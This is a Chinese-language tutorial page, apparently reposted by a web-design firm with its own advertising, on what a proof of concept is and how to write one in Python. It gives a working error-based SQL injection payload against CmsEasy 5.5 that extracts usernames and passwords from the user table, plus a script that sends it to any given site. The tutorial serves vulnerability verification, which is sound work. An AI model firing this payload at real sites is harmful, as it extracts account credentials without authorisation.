新聞中心
如今,PoC 的編寫(xiě)在我們安全研究團(tuán)隊(duì)是每個(gè)人必備的技能之一。那么,PoC是什么呢?我們應(yīng)該如何優(yōu)雅的來(lái)進(jìn)行編寫(xiě)?

成都一家集口碑和實(shí)力的網(wǎng)站建設(shè)服務(wù)商,擁有專(zhuān)業(yè)的企業(yè)建站團(tuán)隊(duì)和靠譜的建站技術(shù),十余年企業(yè)及個(gè)人網(wǎng)站建設(shè)經(jīng)驗(yàn) ,為成都超過(guò)千家客戶(hù)提供網(wǎng)頁(yè)設(shè)計(jì)制作,網(wǎng)站開(kāi)發(fā),企業(yè)網(wǎng)站制作建設(shè)等服務(wù),包括成都營(yíng)銷(xiāo)型網(wǎng)站建設(shè),高端網(wǎng)站設(shè)計(jì),同時(shí)也為不同行業(yè)的客戶(hù)提供成都網(wǎng)站設(shè)計(jì)、成都做網(wǎng)站的服務(wù),包括成都電商型網(wǎng)站制作建設(shè),裝修行業(yè)網(wǎng)站制作建設(shè),傳統(tǒng)機(jī)械行業(yè)網(wǎng)站建設(shè),傳統(tǒng)農(nóng)業(yè)行業(yè)網(wǎng)站制作建設(shè)。在成都做網(wǎng)站,選網(wǎng)站制作建設(shè)服務(wù)商就選創(chuàng)新互聯(lián)公司。
0x00 我們需要掌握的幾個(gè)的概念
PoC(全稱(chēng):Proof of Concept)中文意思是“觀點(diǎn)證明”。在安全行業(yè)中PoC則是一段驗(yàn)證漏洞的程序,使我們能夠確認(rèn)這個(gè)漏洞是真實(shí)存在的。
python,是一種面向?qū)ο蟆⒔忉屝陀?jì)算機(jī)程序設(shè)計(jì)語(yǔ)言。常見(jiàn)的一些庫(kù)我們需要了解,比如:urllib,urllib2,re,request,socket等,本文我們要使用Python這門(mén)語(yǔ)言,Python的基礎(chǔ)知識(shí)我們不做講解。
SQL Injection,通過(guò)把SQL命令插入到Web表單遞交或輸入域名或頁(yè)面請(qǐng)求的查詢(xún)字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。
0x01 PoC編寫(xiě)流程
場(chǎng)景還原:某網(wǎng)站托管公司,旗下托管了數(shù)萬(wàn)個(gè)站點(diǎn),負(fù)責(zé)這些站點(diǎn)的安全,但是突然某一天,某知名CMS程序被爆出存在一個(gè)高危的SQL注入,某網(wǎng)管排查后發(fā)現(xiàn)旗下托管網(wǎng)站中存在幾百個(gè)站點(diǎn)使用該CMS程序,那么一個(gè)一個(gè)去排查是否存在該漏洞是非常繁瑣的,所以,我們需要一個(gè)PoC來(lái)驗(yàn)證下。
·根據(jù)該漏洞詳情的描述,假設(shè)已知出現(xiàn)漏洞的CMS版本號(hào)為4.1,可以去其官網(wǎng)或者GitHub上去下載相對(duì)應(yīng)的版本。
·下載之后,模擬其服務(wù)器真實(shí)環(huán)境,本地進(jìn)行搭建。根據(jù)漏洞描述,進(jìn)行復(fù)現(xiàn),已SQL注入為例,重復(fù)提交不同的參數(shù),觀察不同的返回結(jié)果,同時(shí)注意如果該漏洞不存在出現(xiàn)的結(jié)果。
·根據(jù)漏洞復(fù)現(xiàn)的實(shí)際情況,進(jìn)行PoC的編寫(xiě)。
·PoC寫(xiě)完之后需要進(jìn)行相關(guān)的測(cè)試,已確保該P(yáng)oC的編寫(xiě)沒(méi)有問(wèn)題,比如測(cè)試靶機(jī)程序,以及不存在漏洞的程序。
0x02 SQL Injection poc編寫(xiě)
已知CmsEasy 5.5 UTF-8程序存在SQL注入,烏云漏洞中的漏洞細(xì)節(jié)比較詳細(xì)
(由于wooyun已經(jīng)暫停訪問(wèn),故不上鏈接了)。
·首先,我們需要下載其相關(guān)源碼,進(jìn)行本地搭建。
閱讀漏洞細(xì)節(jié),我們得知其url與payload如下:
URL:http://xxx.xxx/celive/live/header.php Payload:xajax=LiveMessage&xajaxargs[0]=name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20
·漏洞復(fù)現(xiàn):我們根據(jù)其漏洞描述,進(jìn)行復(fù)現(xiàn),該注入點(diǎn)需要發(fā)起一個(gè)Post請(qǐng)求,我們使用Firefox瀏覽器配合hackbar插件進(jìn)行復(fù)現(xiàn),填入url與payload,發(fā)送,獲取其賬戶(hù)密碼。
漏洞效果如下:
這樣,我們的漏洞就已經(jīng)復(fù)現(xiàn)成功了。接下來(lái),我們來(lái)寫(xiě)Poc。
#!/usr/bin/env python
# coding:utf-8
import urllib2
import urllib
import re
import sys
def verify(url):
target = '%s/celive/live/header.php' % url
#需要發(fā)送的數(shù)據(jù)
post_data = {
'xajax': 'LiveMessage',
'xajaxargs[0]': "name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- " }
try:
#發(fā)送請(qǐng)求
req = urllib2.Request(target, data=urllib.urlencode(post_data))
response = urllib2.urlopen(req)
#處理請(qǐng)求,進(jìn)行判斷
if response:
data = response.read()
if "XPATH syntax error" in data:
print "%s is vulnerable" % target
else:
print "%s is not vulnerable" % target
except Exception, e:
print "Something happend..."
print e
def main():
args = sys.argv
url = ""
if len(args) == 2:
url = args[1]
verify(url)
else:
print "Usage: python %s url" % (args[0])
if __name__ == '__main__':
main() 當(dāng)前標(biāo)題:創(chuàng)新互聯(lián)Python教程:python poc是什么
新聞來(lái)源:http://www.5511xx.com/article/dhcepih.html


咨詢(xún)
建站咨詢(xún)
